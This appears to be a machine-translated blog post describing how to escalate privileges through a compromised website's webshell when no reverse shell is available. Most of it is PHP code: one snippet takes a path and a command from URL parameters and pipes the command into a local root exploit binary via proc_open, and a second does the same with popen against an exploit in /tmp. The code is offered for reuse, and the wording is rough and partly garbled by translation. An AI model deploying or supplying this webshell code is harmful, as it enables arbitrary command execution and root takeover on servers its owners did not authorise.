Detailed explanation of non interactive options under Linux

preface

After I got the Webshell of a certain station before, I found that the website could not rebound shell when I claimed the right. Also, when you're penetrating, you often encounter something that doesn't bounce back to shell, and you don't know if the claim is successful because there's no interactive environment. So, I wrote a simple tool. Friends in need can refer to the study.

Methods the following

proce_open()

// path Is the absolute path of the claim tool , For example, :/usr/local/htdocs/2.6.18
// cmd It's a command that you need to execute, for example :whoami
if(isset($_GET['path']) && isset($_GET['cmd'])){
 $path = $_GET['path'];
 $cmd = $_GET['cmd'];
 $descriptorspec = array(
  0 => array("pipe", "r"),
  1 => array("pipe", "w"),
  2 => array("pipe", "w")
 );
 $process = proc_open($path, $descriptorspec, $pipes);
 
 if (is_resource($process)) {
  fwrite($pipes[0],$cmd);
  fclose($pipes[0]);
  echo stream_get_contents($pipes[1]);
  echo stream_get_contents($pipes[2]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  $return_value = proc_close($process);
 }  
}

The code is very simple. If you don't understand it, you can read the PHP manual. popen() The same effect can be achieved here

In addition, once we have this code, we can directly drop the pick-up tool onto the server, and then change the PHP code to test which pick-up tool is available.

popen()

This was sent by a person before toast, and the code was left intact below. A slight change of 1 will achieve the above effect

$sucommand = "/tmp/2.6.18-2011";
$fp = popen($sucommand ,"w");
fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");
pclose($fp);

conclusion